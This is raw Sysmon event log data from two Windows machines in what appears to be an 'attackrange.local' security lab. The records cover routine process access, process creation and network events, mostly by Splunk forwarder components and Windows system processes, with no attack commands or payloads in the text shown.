10341000x80000000000000001047839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-883C-6151-E579-00000000FC01}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.662{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-883C-6151-E579-00000000FC01}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.641{5EBD8912-883C-6151-E579-00000000FC01}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:44.377{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADFE6137E99F4AB691BCBDCFED0C0FC,SHA256=0116823A333EDF2AAB48A940B0BCABF4062A29B2B6FE679677D6AC2D7D60194B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:41.108{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-33170-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:45.732{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2EC9566148D07EE60CF61852A91B775,SHA256=57831A59F392E96DC0C8CD6A015D7366C8F77E3A279986BFEA958B90A5C25342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.643{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB68EF916FCBA9C2FD442BF8BB106B7A,SHA256=E57C0A514BE078D2EE78DF0DED586DBD008A4C6BD502EA4C7246B1F512173E75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.410{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DD592ACC61E951FF3D7A0A4D389377D,SHA256=FDE911936FE0C4281AC48846697FD7F2433252D5DE7A81C6AEAB5511C9BD0565,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.362{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-883D-6151-E679-00000000FC01}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.360{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.359{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.359{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.359{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.359{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-883D-6151-E679-00000000FC01}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.359{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-883D-6151-E679-00000000FC01}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.342{5EBD8912-883D-6151-E679-00000000FC01}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:42.932{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49211-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:46.862{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4297MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:46.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9D432CF56821D140D4C8B4DAD0CD98,SHA256=0CA1D2F30A9316025EDF2A3542F70CE5D5723981B1CCC99E07AC3C0ADFA66300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.427{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2E8B88346C8664FB46C043F814EB87,SHA256=ECAAE33516AA67AFA7E304CDDF53B246293A90218CF75DCB31FBCBD02790FC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:46.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D5BEC005AF1B710EFAEAE6E6CD688EC,SHA256=7BA7F6D95F22EF7FA6A4C50F7F3EAC5107195BDC3CCE03511F1B9747B52C8DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:46.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF1FF64FCB1A54225F51D855872DB2CE,SHA256=2D4275569E00366E500EB40A25C41C0AED8591C4089356B5995F312ABDF19267,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:42.828{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59251-false10.0.1.12-8000- 10341000x80000000000000001047861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.212{5EBD8912-883E-6151-E779-00000000FC01}66804384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-883E-6151-E779-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-883E-6151-E779-00000000FC01}6680C:\Program 